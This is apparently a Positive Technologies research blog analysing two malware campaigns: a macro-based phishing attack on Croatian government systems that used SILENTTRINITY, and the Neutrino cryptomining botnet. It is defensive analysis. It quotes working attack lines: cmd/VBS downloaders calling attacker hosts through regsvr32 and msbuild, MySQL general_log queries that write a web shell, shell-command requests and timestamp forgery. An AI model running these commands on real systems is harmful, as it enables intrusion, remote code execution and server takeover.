Channel: Positive Technologies - learn and secure

IronPython, darkly: how we uncovered an attack on government entities in Europe


Hunting for new and dangerous cyberthreats is the job of the Positive Technologies Expert Security Center (PT ESC). In early April 2019, PT ESC analysts detected a targeted attack on the Croatian government. In this article, we will outline what makes this threat so interesting: delivery chain, indicators of compromise, and use of a new post-exploitation framework that to our knowledge has not previously been used by threat actors.

Infection chain

On April 2, 2019, during regular malware monitoring, an unusual Office document caught the eye of specialists at PT ESC.
   
Figure 1. Malicious attachment (named "Package Notification")
Disguised as a package notification, the file had been created in Microsoft Excel and saved in the old .xls format on the previous day (timestamp 2019-04-01 16:28:07 (UTC)). However, the "last printed" timestamp (2018-07-25 00:12:30 (UTC)) indicates that the document had been used in 2018. More on this later.

Note that the Comments field (which can be edited from within Excel) contains Windows console commands:

cmd.exe /c echo Set objShell = CreateObject("Wscript.Shell"): objShell.Run "net use https://postahr.vip", 0, False: Wscript.Sleep 10000: objShell.Run "regsvr32 /u /n /s /i:https://postahr.vip/page/1/update.sct scrobj.dll", 0, False: Set objShell = Nothing  > C:\users\%username%\appdata\local\microsoft\silent.vbs


Figure 2. Comments field with suspicious contents
Figure 3. Contents of the Comments field, in binary form
 This command creates a Visual Basic script that, when run, performs the following actions:

  • Establishes a WebDAV network connection.
  • Downloads and runs the file for the next stage of infection, with the help of the legitimate system utility regsvr32.

When an HTTP(S) connection is established with the attacker's server, an NTLM request is sent. The hash in this request can be captured and reused in pass-the-hash attacks. We did not find signs of such attacks; the reasons for connecting to the network resource remain unclear.

The technique of using regsvr32 (which registers and unregisters ActiveX controls) for malicious purposes, known as Squiblydoo, is not new. Attackers use it to get around application whitelisting and evade antivirus detection.

The text of the Comments field does not do anything by itself—it has to be triggered by something. When the victim opens the Excel document, a message written in Croatian asks the victim to enable macros:
   
Figure 4. Image asking the user to enable macros
If the user clicks the "Enable Content" button, another fake message appears, containing the logo of the Croatian Post and a package notification:

Figure 5. Fake package notification
Meanwhile, the macro has run the command from the Comments field and the new script is added to the system startup items:

Figure 6. Key logic in the macro
Curiously, the new script is not run by the macro. It is possible that this is by design, with the attackers choosing to start the next stage of infection only after the system has restarted and the user has logged in. We will return to this detail in a bit.

Portions of the script have interesting "handwriting." Well-structured, indented, and neatly formatted, this code may have been borrowed from third-party sources or may even be output from programs that automatically generate such documents.
   
Figure 7. Macro code that has likely been borrowed
Searching for keywords found in the code turns up a large number of hits. Most likely, the hackers simply found the necessary code online and tweaked it as necessary:
   
Figure 8. A similar macro on issuu.com
Figure 9. A similar macro on stackoverflow.com

Figure 10. A similar macro on dummies.com

Let's return to the next stage of infection with regsvr32. When the command runs, a JavaScript scriptlet (named update.sct) is downloaded from the attacker server. The body contains Base64-encoded binary data. Once decoded, the data is deserialized and run by means of .NET Framework.
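The extract-and-decode step can be illustrated with a short Python sketch. The scriptlet layout and the variable name below are hypothetical, modeled on the publicly available examples the attackers borrowed from; the real update.sct carries a serialized .NET object, not a text greeting.

```python
import base64, re

# Toy scriptlet modeled on the update.sct structure (contents are invented):
# a <script> body holding a Base64 buffer that the real sample hands to
# .NET for deserialization. Here we reproduce only extract-and-decode.
sct = '''<?xml version="1.0"?>
<scriptlet>
<registration progid="Demo">
<script language="JScript"><![CDATA[
var serialized_obj = "SGVsbG8sIC5ORVQh";
]]></script>
</registration>
</scriptlet>'''

match = re.search(r'serialized_obj\s*=\s*"([A-Za-z0-9+/=]+)"', sct)
decoded = base64.b64decode(match.group(1))
```

In the real scriptlet the decoded bytes are fed to .NET deserialization, which is what ultimately yields executable code in memory.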

Figure 11. update.sct scriptlet downloaded from the attacker server
Note that this code, too, was borrowed by the attackers from public sources:

Figure 12. Similar code on rastamouse.me
Figure 13. Similar code on github.com
By all appearances, the hackers did not have a deep understanding of the tools used. For example, the scriptlet calls the setversion function, which does not do anything. (The same is true for one of the example scriptlets available online.)

When unpacked and run, the downloaded object is a .NET Portable Executable (PE) file.

Figure 14. Header of the PE file
Figure 15. Reference to SharpPick in the PE file's debugging information
The path to the source code folder is still present after compilation. Because of the -master suffix, we know that the project had previously been cloned from a repository. One folder path is an artifact of SharpPick, well-known software for downloading and running PowerShell code via .NET without invoking the PowerShell interpreter.

Although SharpPick is available on GitHub, it is worth checking that no major modifications have been made to it by the attackers.

Figure 16. Part of the decompiled SharpPick code
Decompiling gives us pseudocode that, when run, decodes a PowerShell script from Base64 and runs it:

Figure 17. Partially converted PowerShell script
Simplifying the code a bit, we can easily see what it does:

  • An object is created to interact with the web server with the indicated values for User-Agent, Cookie, and proxy settings.
  • The payload is downloaded from the indicated address.
  • The downloaded data is decoded with the specified RC4 key and run.
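The RC4 step is standard; a minimal Python implementation makes the decode stage concrete. The key and plaintext below are the classic public test vector, not the attackers' actual values.

```python
def rc4(key: bytes, data: bytes) -> bytes:
    # Key-scheduling algorithm (KSA)
    S = list(range(256))
    j = 0
    for i in range(256):
        j = (j + S[i] + key[i % len(key)]) % 256
        S[i], S[j] = S[j], S[i]
    # Pseudo-random generation (PRGA), keystream XORed with the data
    out = bytearray()
    i = j = 0
    for byte in data:
        i = (i + 1) % 256
        j = (j + S[i]) % 256
        S[i], S[j] = S[j], S[i]
        out.append(byte ^ S[(S[i] + S[j]) % 256])
    return bytes(out)
```

Because RC4 is symmetric, the same function both encrypts and decrypts, which is why a single routine in the downloader suffices.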

Unfortunately, the command-and-control (C2) server was no longer accessible by the time our investigation was underway, so we could not recover the data previously served from it. However, information available online (such as in a FireEye report) makes it clear that the final link in this infection chain was Empire Backdoor, which enables remote control of a victim's computer and is part of the Empire post-exploitation framework.
   
Figure 18. Use of a similar PowerShell script in attacks targeting a WinRAR vulnerability
Other patterns in the script are consistent with online materials on pentesting, with special attention to hiding attacker infrastructure behind proxy servers. The most likely source of information used by the attackers was a report from Payatu Technologies. It includes detailed instructions on such topics as redirection and logging, with a focus on how to do so with Empire.
   
A few hours later (2019-04-02 16:52:56 (UTC)), we discovered yet another "package notification." The document had similarities to the previous one: it was also found in Croatia, had the same name, and sported the same fake logo. But there were differences as well.
The malicious code was in the same place (the Comments field), but this time did something different:

cmd.exe /c echo Set objShell = CreateObject("Wscript.Shell"):objShell.Run "C:\windows\system32\cmd.exe /c net use \\176.105.255.59\webdav",0:Wscript.Sleep 60000: objShell.Run "%windir%\Microsoft.Net\Framework\v4.0.30319\msbuild.exe \\176.105.255.59\webdav\msbuild.xml" , 0, False: Set objShell = Nothing  > C:\users\%username%\appdata\local\microsoft\silent.vbs

  • The network connection is made via SMB.
  • Downloading and activation of the next infection stage takes place with the help of msbuild, a legitimate .NET Framework utility.

The network address used for the SMB connection, funnily enough, contains the string "webdav" (underlining the connection of this attack to the previous one). A pass-the-hash attack is still possible with this method, although there is no confirmation that one actually took place. As before, application whitelisting is bypassed by means of a legitimate utility (this time, msbuild). Before dissecting how msbuild was used, it is worth looking at the differences in the macro code between versions.

The attackers did not make major changes to the VBA code. But this time, instead of merely being dropped and registered for startup, the VBS script runs as soon as the document is opened. Our guess is that the attackers had simply forgotten this step the first time, realized their oversight later, and corrected it in the newer version.
   
Figure 19. Comparison of macro code between the older and newer versions
The next stage of infection consists of an XML document with C# code. One feature of msbuild is its ability to compile and run inline code on the fly—as can be seen from the comments, still intact at the beginning of the document.

Yet again, the code contains a Base64 buffer that will be decoded, deflated, and run. And sure enough, the attackers relied on a publicly available template, as indicated by the comments and large number of sites with similar code.
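The unpack step can be reproduced in a few lines of Python. The payload bytes below are a placeholder; the point is the Base64-plus-raw-DEFLATE layering, the form .NET's DeflateStream produces (no zlib header or checksum).

```python
import base64, zlib

payload = b"in-memory .NET assembly (placeholder)"

# Raw DEFLATE stream: strip the 2-byte zlib header and 4-byte Adler-32
# trailer from zlib.compress() output, then Base64-encode -- approximating
# the buffer embedded in the msbuild.xml task.
packed = base64.b64encode(zlib.compress(payload)[2:-4]).decode()

# Reversing it: Base64-decode, then inflate with wbits=-15 (raw deflate)
unpacked = zlib.decompress(base64.b64decode(packed), wbits=-15)
```

The negative `wbits` value tells zlib to expect a headerless stream, which is the usual stumbling block when re-implementing .NET decompression outside .NET.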

Figure 20. msbuild.xml task downloaded from the attacker server
The result will be the same as last time: a .NET PE file will be loaded into RAM and run. The debugging information contains two clues: the code was compiled in a virtual machine (possibly to complicate attribution) and a reference is found to a folder named SILENTTRINITY, which will be important for our discussion.
   
Figure 21. Reference to SILENTTRINITY in debugging information for the PE file
Hot on the trail of these two documents, we found another two with the same file format, name, and deceptive image. The documents were available in late August 2018, which confirms our hypothesis that the campaign had been going on for quite some time.

Last year, the hackers did not use the Comments field, instead repurposing legitimate utilities. The malicious component was downloaded by certutil, which is intended for managing certificates, and launched by Windows Management Instrumentation (WMI):

Figure 22. Comparison of two different 2018 macros
Unfortunately, because so much time had already passed, we were unable to reconstruct the subsequent stages of the 2018 attacks.

In one pair of documents, the only difference in the VBA code of the later version was the deletion of comments explaining the purpose of each step:
   
Figure 23. Comparison of 2018 and 2019 macros

SilentTrinity framework

 Performing an online search for SILENTTRINITY, to which we found a reference in the PE file debugging information, gives a very good idea of the origin of this link in the attack chain. In October 2018, Marcello Salvati (researcher at Black Hills Information Security) uploaded the SILENTTRINITY project to GitHub. His idea was to combine the flexibility of Python with the capabilities of well-known PowerShell post-exploitation frameworks by writing the tool in IronPython. The project continues to be developed today.

We won't get into the inner workings of SilentTrinity here (see the detailed talk by its creator). But we will describe the basic mechanism and a few highlights of the implementation.

Here is what happens after the PE file is run (although the intermediate link does not necessarily have to be a PE file):

  • Contact is made with the C2 server to download a ZIP archive with necessary dependencies and main Python script.
  • The archive contents are extracted, without being saved to disk.
  • Dependencies are registered for properly handling Python scripts.
  • The main Python script runs and waits for a task from the attacker.
  • Each task is sent as a ready-to-run Python script.
  • The task is run on the victim's system in a separate thread.
  • The result is sent back to the C2 server.
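The in-memory handling of the dependency archive (the first two steps above) can be sketched with Python's standard library. The archive name and contents are invented for illustration; the idea is that nothing below ever touches the disk.

```python
import io, zipfile

# Build a ZIP in memory, standing in for the dependency archive the stager
# downloads from the C2 server.
buf = io.BytesIO()
with zipfile.ZipFile(buf, "w") as z:
    z.writestr("Main.py", "print('task runner')")

# Extraction straight from the in-memory buffer -- the fileless part:
# the archive is parsed and its contents read without being saved to disk.
archive = zipfile.ZipFile(io.BytesIO(buf.getvalue()))
main_script = archive.read("Main.py").decode()
```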

Figure 24. How SilentTrinity works (source: github.com/byt3bl33d3r/SILENTTRINITY) 
A few facts of note about the implementation:

  • In addition to IronPython, there is support for the Boo language (a strongly typed, Python-like language for .NET).
  • The attack is fileless and does not require disk space: dependencies, scripts, and tasks all reside in RAM.
  • All C2 traffic is encrypted with AES, including the archive with dependencies, tasks, and command output.
  • Session keys are negotiated using the Diffie–Hellman protocol.
  • Network transport takes place over HTTP(S) with proxy support.
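The key-agreement idea can be shown with a toy Diffie–Hellman exchange. The parameters below are invented for illustration and far too small for real use; they are not SilentTrinity's actual values.

```python
# Toy Diffie-Hellman: both sides derive the same shared secret from
# public values without ever transmitting their private exponents.
p = 4294967291        # a prime (hypothetical public modulus, too small for real use)
g = 5                 # hypothetical public base

a_priv, b_priv = 123456789, 987654321   # private exponents, never sent
A = pow(g, a_priv, p)                   # client's public value
B = pow(g, b_priv, p)                   # server's public value

shared_a = pow(B, a_priv, p)            # client-side shared secret
shared_b = pow(A, b_priv, p)            # server-side shared secret
```

In the real framework the agreed secret is then used to key the AES encryption of all C2 traffic.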

Figure 25. User interface on the server side of SilentTrinity

On the day of the attacks, the PE loader was uploaded to VirusTotal. None of the antivirus engines on the site classified the loader as malware. This is not surprising: the binary is never saved to disk, so a file signature would make little difference. And in any case, static detection is far from the only way to protect users.
   
Figure 26. Cloud scan of the SilentTrinity loader on the day of the attacks
A few days after the attack, detection verdicts started to pop up. But at the time of the attacks, the threat was unknown or (at any rate) antivirus engines did not have the relevant signatures.

Figure 27. Current cloud scan result for the SilentTrinity loader
This is the likely reason why the attackers chose this method. We are not aware of any previous cases in which SilentTrinity had been used for malicious ends.

Attacker infrastructure

The network infrastructure used by the hackers correlates chronologically with the attacks.
 
Table 1. Domains used as attacker servers
The domain names were chosen to resemble those of legitimate sites. Such names would presumably arouse less suspicion among phishing targets. Not all the impersonated domains were related to Croatia.
All attacker domains were registered with WhoisGuard privacy protection. Ordinarily used to protect domain owners from spam by hiding personal information, this feature helped the attackers to remain anonymous.

Servers for distributing and managing the malware were rented from Breezle, a Dutch provider.
The available data on hosts, addresses, and domains used—as well as the high number of connections between them—suggests a large-scale malicious effort in this case. The campaign may have included other similar tools and additional, currently unknown cases of infection.
   
Figure 28. Graph of the attacker infrastructure

Conclusion

The day after detection of the malicious documents, a press release was issued in which the Croatian Information Systems Security Bureau raised the alarm about targeted phishing attacks. Traces were discovered on multiple Croatian government systems. According to the press release, the victims received emails with links to a phishing site. There they were prompted to download a malicious document, which was the jumping-off point of our analysis.

Our investigation fills in the gaps in the attack chain. We would like to conclude by recommending protection methods to mitigate the risk of such threats:


  • Monitoring of use of certain whitelisted applications (certutil, regsvr32, msbuild, net, wmic).
  • Scanning and analysis of email attachments as well as links.
  • Periodic scanning of RAM of networked computers.


Author: Aleksey Vishnyakov, Positive Technologies

P.S. The author has presented on the topic at Positive Hack Days 9. For video of this and other talks from PHDays, see PHDays broadcast.

Indicators of compromise

0adb7204ce6bde667c5abd31e4dea164
13db33c83ee680e0a3b454228462e73f
78184cd55d192cdf6272527c62d2ff89
79e72899af1e50c18189340e4a1e46e0
831b08d0c650c8ae9ab8b4a10a199192
92530d1b546ddf2f0966bbe10771521f
c84b7c871bfcd346b3246364140cd60f
hxxps://postahr.vip/page/1/update.sct
hxxps://posteitaliane.live/owa/mail/archive.srf
hxxps://konzum.win/bat3.txt
hxxp://198.46.182.158/bat3.txt
hxxps://176.105.255.59:8089
[\\]176.105.255.59\webdav\msbuild.xml
postahr.online
176.105.254.52
93.170.105.32


Finding Neutrino

In August 2018, PT Network Attack Discovery and our honeypots began to record mass scans of phpMyAdmin systems. Scans were accompanied by bruteforcing of 159 various web shells with the command die(md5(Ch3ck1ng)). This information became the starting point of our investigation. Step by step, we have uncovered the whole chain of events and ultimately discovered a large malware campaign ongoing since 2013. Here we will give the details and the whole story, from start to finish.

We got scanned!

Infected bots from all over the world were randomly scanning IP addresses on the Internet. In doing so, they scanned PT NAD networks and diverse honeypots.

Request as viewed in the PT NAD interface
Scanning happened as follows:


  • First, the bot bruteforced the path to phpMyAdmin by moving down a list. 
  • Once it found phpMyAdmin, the bot started bruteforcing the password for the root account. The dictionary contained about 500 passwords, the first guess of the attackers being "root" (the default password). 
  • Next, after the password was successfully bruteforced, nothing happened. The bot did not exploit vulnerabilities and did not execute code in any other way.
  • In addition to phpMyAdmin, the bot bruteforced paths to web shells, also by moving down a list, and tried executing simple PHP commands. The dictionary contained 159 shell names, and this was the stage that left us wondering the most.

Request to the web shell with a command. If the response contains a correct MD5 value, the server is infected.
Such scans were noted and described many times in summer 2018 by other researchers (isc.sans.edu/diary/rss/23860). But nobody tried to discover their source and purpose.

To get the answers, we prepared honeypots posing as vulnerable servers. They were phpMyAdmin installations with root:root credentials and web shells responding with the correct MD5 hash. For instance, in the previous screenshot, this was a hash value of 6c87b559084c419dfe0a7c8e688a4239.
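The responder logic of such a honeypot is tiny: it simply evaluates the same expression an infected shell would, returning the hex MD5 of the challenge string so the scanner marks the host as compromised. A minimal Python stand-in for the PHP `die(md5(...))` behavior:

```python
import hashlib

def shell_response(challenge: str) -> str:
    # Mimic an infected web shell answering die(md5(<challenge>)):
    # return the 32-character hex MD5 digest of the challenge string.
    return hashlib.md5(challenge.encode()).hexdigest()
```

For the "Ch3ck1ng" probe, this yields exactly the value the scanning bot expects to see in the response body.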

After a while, our honeypots brought their first results.

The payload

The honeypot with the web shell started to receive commands containing a payload. One such payload, for instance, instructed the server to save a new shell named images.php and to execute commands through it:


After we decoded the Base64 commands, it became clear that the first two requests gather the computer's configuration, and the third executes a PowerShell script to download external components. Base64 commands are transmitted in the "code" parameter. For authorization, the SHA1 hash of the "a" parameter value is used: for the string "just for fun" the hash is 49843c6580a0abc8aa4576e6d14afe3d94e3222f, and only the last two bytes are checked.
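The lax authorization check can be modeled as follows. The function name is ours; the secret string and the two-byte comparison follow the behavior described above, and the truncated check is what makes forgery trivial.

```python
import hashlib

def authorized(provided: str, secret: str = "just for fun") -> bool:
    # Only the last two bytes (four hex characters) of the SHA1 digest
    # are compared, mirroring the shell's weak check.
    expected = hashlib.sha1(secret.encode()).hexdigest()
    return provided[-4:] == expected[-4:]
```

With only 65,536 possible suffixes, an attacker who knows the scheme but not the secret could brute-force a passing value almost instantly.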

In most cases, the external component is a Monero cryptocurrency miner. In Windows it gets installed in the %TEMP% folder under the name lsass.exe. The miner version may vary. Some versions function without arguments and have a hard-coded wallet address. Most likely, this was done to reduce the risk of detection.

The second potential component is a PowerShell script with DLL library inside. It is downloaded from the server by another PowerShell script. The library code is executed in memory, so it is not stored on disk. The DLL library is responsible for spreading the malware and adding to the botnet.

A similar case, Ghostminer, was already described by researchers from Minerva Labs in March 2018 (bit.ly/2XwjSxO). But it derives from Neutrino, which dates back to 2013. Neutrino is also known as Kasidet. It was previously distributed via emails and various exploit kits. Its functionality changed, but the protocol for communicating with the command and control server and other artifacts remain unchanged. For instance, the string "just for fun" was used for authentication in samples as old as January 2017. Nine reports on Neutrino from 2014 can be found in Malpedia (bit.ly/2VrRJpG). The details of the last report from Minerva Labs enabled us to spot changes in the ways this malware is distributed.

Neutrino

The second component is the one that interests us, because it searches for new hosts to infect.

How Neutrino searches for new servers

After a server is infected, the first thing Neutrino does is change such TCP stack parameters as MaxUserPort and TcpFinWait2Delay. This is done to set up the infected host for the fastest scanning possible.

Code for changing TCP stack parameters 

Next it contacts the command and control (C2) server, which oversees scanning on the infected computer. The C2 server sends a command to check random Internet servers for one of several vulnerabilities. The list of checks in the Neutrino version from October 2018 was rather wide-ranging:


  • Search for XAMPP servers with WebDAV
  • Search for phpMyAdmin servers potentially vulnerable to CVE-2010-3055 (an error in the setup.php configuration script)
  • Search for Cacti's Network Weathermap plug-ins vulnerable to CVE-2013-2618
  • Search for Oracle WebLogic vulnerable to CVE-2017-10271
  • Search for Oracle WebLogic vulnerable to CVE-2018-2628
  • Search for IIS 6.0 servers vulnerable to remote code execution via the HTTP PROPFIND method (CVE-2017-7269)
  • Search for and exploitation of the infamous hole in Apache Struts2
  • Search for exposed Ethereum nodes: in June 2018, attackers were able to steal $20 million in this way
  • Bruteforcing the "sa" account in Microsoft SQL: after successful bruteforcing, Neutrino tries to execute code via xp_cmdshell
  • Search for phpMyAdmin installations without credentials
  • Bruteforcing phpMyAdmin installations with credentials
  • Extensive logic for searching for listed PHP web shells

Modules that appeared after the Minerva Labs report are shown in green. The last item on this list, the search for web shells, is the one responsible for the scans that caused us to start our investigation. The list included 159 addresses with unique parameters. For example:


  • wuwu11.php:h
  • weixiao.php:weixiao
  • qwq.php:c

Code responsible for web shell scanning
The preceding screenshot illustrates the relevant Neutrino code.

In addition to scanning for vulnerabilities, Neutrino can execute arbitrary commands and take screenshots. In the version from December 2018, the authors added three more modules:


  • Search for exposed Hadoop servers
  • Bruteforcing credentials for TomCat servers
  • Search for JSP shells from a list


We have seen the names of these JSP shells before in the JexBoss (github.com/joaomatosf/jexboss) and JBoss worm (bit.ly/2UeM9H9).

While studying this botnet, we saw it change behavior several times. The first scans, in summer, contained the "Ch3ck1ng" check; by February the bot had moved on to "F3bru4ry". These strings are stored inside the Neutrino module in static form, so each change indicates an update to Neutrino, such as a changed C2 address or a new module.

C2 communication

Data exchange between the Neutrino bot and C2 server is encoded in base64. The Cookie and Referer headers are always the same, and serve for authorization.


Exchange of commands between Neutrino bot and C2 server
In the very beginning, the bot checks the C2 connection with a simple pair of messages: Enter–Success. Next it checks in by sending brief information on the system. This request is shown in the previous screenshot. The request provides data on RAM, CPU, and username. The serial number of the volume containing the system partition is used as a unique host-specific ID. The C2 server responds with a new task for the host. This could be a search for new vulnerable hosts or execution of commands. For instance, the PMAFind command (in the screenshot) initiates a search for servers containing phpMyAdmin, Hadoop, Tomcat, listed shells, and WebDAV.

If Neutrino finds a vulnerable server (for example, by bruteforcing the phpMyAdmin password), it informs the C2 server. The data is Base64-encoded on the wire; decoded, a report looks like this:
PMAFind&XXXXXXXX&TaskId&[Crack:PMA] root/root&http://11.22.33.44/phpmyadmin/index.php
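The encoding round-trip is simple enough to sketch in Python. The field layout below follows the report line shown above; the split-on-"&" framing is our reading of the captured traffic.

```python
import base64

# Report format as observed: fields joined with "&", then Base64-encoded
# for transport between the Neutrino bot and the C2 server.
report = ("PMAFind&XXXXXXXX&TaskId&[Crack:PMA] root/root"
          "&http://11.22.33.44/phpmyadmin/index.php")
wire = base64.b64encode(report.encode()).decode()

# The receiving side reverses the encoding and splits out the fields
fields = base64.b64decode(wire).decode().split("&")
```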

Miner

Unlike the Neutrino module, the miner is stored on disk and starts automatically. This is controlled by a service named "Remote Procedure Call (RPC) Remote" or by a WindowsUpdate task, either of which runs the PowerShell code. This code is stored in the EnCommand field of the WMI namespace root\cimv2:PowerShell_Command. The miner executable itself occupies the adjacent EnMiner field. During operation, Neutrino and the miner write to certain fields of the same namespace, such as process ID (PID) and version number.

The script from the EnCommand field launches EnMiner in several steps.


  1. The KillFake function kills processes that imitate standard ones. One such process could be explorer.exe, if it is run from a place other than %WINDIR%. The function then deletes them from disk.
  2. KillService stops and removes services whose names match the preset mask.
  3. Killer removes services, tasks, and processes by a list of names or by launch arguments.
  4. The Scanner function checks the content of each launched process and deletes any that contain strings typical of cryptocurrency miners.
  5. The lsass.exe miner is saved in the %TEMP% folder and launched.

To generalize, the KillFake, KillService, Killer, and Scanner functions are responsible for getting rid of Neutrino's competitors. They will be described later on in this article. An example of the EnCommand script is available at pastebin.com/bvkUU56w.
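The KillFake heuristic boils down to a name-versus-path check. A simplified stand-in, with an illustrative process list (the real function also kills the process and deletes its binary):

```python
import ntpath

# Well-known system process names that malware commonly impersonates
# (illustrative subset; the real list is the attackers' choice)
SYSTEM_PROCS = {"explorer.exe", "svchost.exe", "lsass.exe"}

def is_fake(name: str, image_path: str, windir: str = r"C:\Windows") -> bool:
    # A process bearing a system name but running from outside the Windows
    # directory is treated as an impostor, as KillFake does.
    if name.lower() not in SYSTEM_PROCS:
        return False
    return not ntpath.normpath(image_path).lower().startswith(windir.lower())
```

Ironically, by this rule the campaign's own miner (lsass.exe in %TEMP%) would be flagged as fake, which is exactly why such routines target competitors' copies.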

Addresses of XMR wallets vary from sample to sample. On average, each address got 10–40 XMR. The first transactions started in December 2017. But some hosts were taken over by other malware. For instance, the address 41xDYg86Zug9dwbJ3ysuyWMF7R6Un2Ko84TNfiCW7xghhbKZV6jh8Q7hJoncnLayLVDwpzbPQPi62bvPqe6jJouHAsGNkg2 received 1 XMR a day starting February 2018, for a total of 346 XMR. The same address is mentioned in a June 2018 report from Palo Alto Networks ("The Rise of Cryptocurrency Miners"). The report describes the surge of malicious cryptocurrency mining. As of June 2018, such miners' estimated haul was $175 million, or five percent of total Monero coins in circulation.

My php, your admin

Because the Neutrino bot itself does not exploit vulnerabilities, but only collects a list of servers, the infection mechanism remained unclear. Our bait consisting of a phpMyAdmin server with default account shed some light on the matter. We watched in real time as our server was attacked and got infected.

phpMyAdmin infection process

Infection took place in several stages:

1. First was login to phpMyAdmin. The credentials had been guessed earlier during scanning.

2. Some reconnaissance. The attacker requests phpinfo scripts at different paths.

3. The phpMyAdmin interface allows making SQL queries to a database. The attacker sends the following queries:

a. select '' into outfile ''
b. SELECT "" INTO OUTFILE "/home/wwwroot/default/images.php"

The content of the SELECT is then saved to disk. If that fails, the following queries are used instead:

SET GLOBAL general_log = 'OFF'
SET GLOBAL general_log_file = '/home/wwwroot/default/images.php'
SET GLOBAL general_log = 'ON'
SELECT ""
SET GLOBAL general_log = 'OFF'
SET GLOBAL general_log_file = 'MySQL.log'

4. And finally, some queries that we are familiar with already:

POST /images.php "a=just+for+fun&code=ZGllKCJIZWxsbywgUGVwcGEhIik7"

An automatic script was written to hack phpMyAdmin. It tries using one of two mechanisms:


  • SELECT INTO OUTFILE writes the content of the query to disk.
  • The log file is piped to a PHP script with the help of MySQL variables.


The first method is well known and usually fails because of the --secure-file-priv option. But we had not seen the second method before. Usually MySQL does not allow piping the log file outside of the @@datadir directory, but this was possible in installations from the phpStudy package. This second method is what made Neutrino so "popular" on phpMyAdmin servers. The web shell content differs between the two infection methods.

This is what the web shell response looks like when created by the second method (piping of MySQL log):



To our delight, the log contains actual dates. They can be found in responses from some images.php shells, which allowed us to determine the actual time they were implanted. This is important, because the sent commands sometimes include the following:

$time = @strtotime("2015-07-16 17:32:32");
@touch($_SERVER["SCRIPT_FILENAME"], $time, $time);

Here $_SERVER["SCRIPT_FILENAME"] contains "images.php". This command changes the file's last-modified date to July 16, 2015, likely a (futile) attempt to complicate analysis of the Neutrino campaign. Based on the content of some shells, it is possible to determine the dates of shell creation.
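The timestamp forgery is easy to reproduce. This Python sketch mirrors what the PHP @touch() call does: compute the epoch value for the fixed 2015 date and stamp a scratch file with it (the file here is a temporary stand-in for images.php).

```python
import calendar, os, tempfile, time

# Epoch seconds for the fixed date the attackers backdate to,
# interpreted as UTC (strtotime's timezone handling is ignored here)
ts = calendar.timegm(time.strptime("2015-07-16 17:32:32",
                                   "%Y-%m-%d %H:%M:%S"))

fd, path = tempfile.mkstemp(suffix=".php")
os.close(fd)
os.utime(path, (ts, ts))              # set atime and mtime, as @touch() does
mtime = int(os.path.getmtime(path))   # read back the forged timestamp
os.remove(path)
```

Filesystem metadata forged this way is why the dates embedded in the shells' response bodies, not the files' mtimes, were the reliable evidence.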

The second malware campaign

Surprisingly, we captured a record not only of images.php, but also of wuwu11.php. Infection occurred via a similar mechanism. However, there were some interesting differences:


  • SQL queries were not sent all at once, but one at a time.
  • The content of the web shells is completely different; wuwu11.php does not require authorization.
  • The payload is different, too. The operators of wuwu11 and similar shells implanted a downloader trojan to chain-load further malware, rather than a miner.


The difference in infection methods, together with the shell bruteforcing built into Neutrino itself, indicates the existence of two simultaneous malware campaigns: Neutrino mines cryptocurrency, while the second campaign downloads other malware.

We analyzed the dates when shells were created on the infected hosts, which let us determine with confidence which campaign came first. The first shells, with the self-explanatory name "test.php", date back to 2013, while "db__.init", "db_session.init", and "db.init" started showing up in 2014. Neutrino started infecting phpMyAdmin servers in January 2018, by means of both vulnerabilities and competitors' shells. The peak of Neutrino activity came in summer 2018. The following graph shows the creation dates of Neutrino shells and those of the competitor.


Botnet structure

As we learned, the Neutrino botnet has a clear division of labor among infected hosts. Some mine cryptocurrency and scan the Internet, while others act as proxy servers. The Gost utility on port 1443 is used for proxying. The shell on such hosts is named image.php (with no "s" at the end).

svchost.eXe 1388 SYSTEM C:\Windows\System\svchost.exe  -L=https://GoST:GoST@:1443

Such proxy hosts are few. They are used to implant images.php on vulnerable servers found previously, as well as to send out commands, primarily for removing competitors from hosts and launching cryptominers. Commands are sent at a rate of up to 1,000 unique IPs per hour.

In most cases, connections to proxy port 1443 originate from subnets of ChinaNet Henan Province Network (1.192.0.0/13, 171.8.0.0/13, 123.101.0.0/16, 123.52.0.0/14, and others).

Now that we know the structure of the malware campaigns, we can scan the Internet for their shells and estimate the size of the botnet.

Scanning the Internet

As mentioned already, the images.php web shell is implanted in the root WWW directory. Its presence and the HTTP response are clear indicators of infection. To estimate the size of the botnet, we need to send a query to images.php on all web servers on the Internet. A list of servers with port 80 is readily available at scans.io. (Censys scans the Internet and updates the list weekly.) It contains 65 million web servers, and we sent the query "GET /images.php" to each. We got a positive response from about 5,000 servers, which is only a portion of the botnet. Our honeypots were regularly scanned from new, previously unidentified IP addresses.
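Classifying the responses can be automated with a simple heuristic. The marker below is an assumption on our part (MySQL 5.x general-log lines begin with a YYMMDD timestamp, matching the log-piping infection method); a real check should be tuned against captured shell responses.

```python
import re

# MySQL 5.x general_log lines start like "150716 17:32:32\t  1 Query ...";
# a shell created via the log-piping trick echoes such lines in its body.
LOG_LINE = re.compile(r"\d{6}\s+\d{1,2}:\d{2}:\d{2}")

def looks_infected(body: str) -> bool:
    # Heuristic: flag response bodies that carry MySQL log timestamps
    return bool(LOG_LINE.search(body))
```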

Botnet composition

So what, and who, are all these servers? Shodan can help us find the answer. More than half of the servers return Win32 or Win64 in the "Server" header.

Note the Server header: Apache on Windows.

According to Shodan, the share of Windows among Apache servers is less than four percent. So the abnormally high number of Windows systems in our results must be caused by specific software. True enough, some servers return the following start page:

phpStudy, main page
phpStudy is an integrated learning environment popular not only in China. In a single click it installs the Apache web server, MySQL database, PHP interpreter, and phpMyAdmin panel. It also has several configurations for Windows and Linux. The latest version of phpStudy 2017 from the official site is still vulnerable to log file piping. You can verify this for yourself.

The vulnerability in phpStudy is not the only major source of bots. The scan revealed over 20,000 servers vulnerable to CVE-2010-3055. This is also a vulnerability in phpMyAdmin, but related to the setup.php configuration script. The botnet sends them POST queries that contain malicious configurations. Next, in terms of bot sources, come servers with Cacti's Network Weathermap (CVE-2013-2618) and XAMPP with exposed WebDAV.

Hackers found a use even for phpMyAdmin panels that are patched but have weak passwords. A common monetization technique is to export the database to the attackers' own storage, delete it from the server via phpMyAdmin, and leave a ransom message:


Most likely, this has nothing to do with the Neutrino campaign.

Conclusions

In 2018, Neutrino development continued its march forward. The malware used to be distributed via email attachments and exploit kits, but in 2018 it debuted as a botnet.

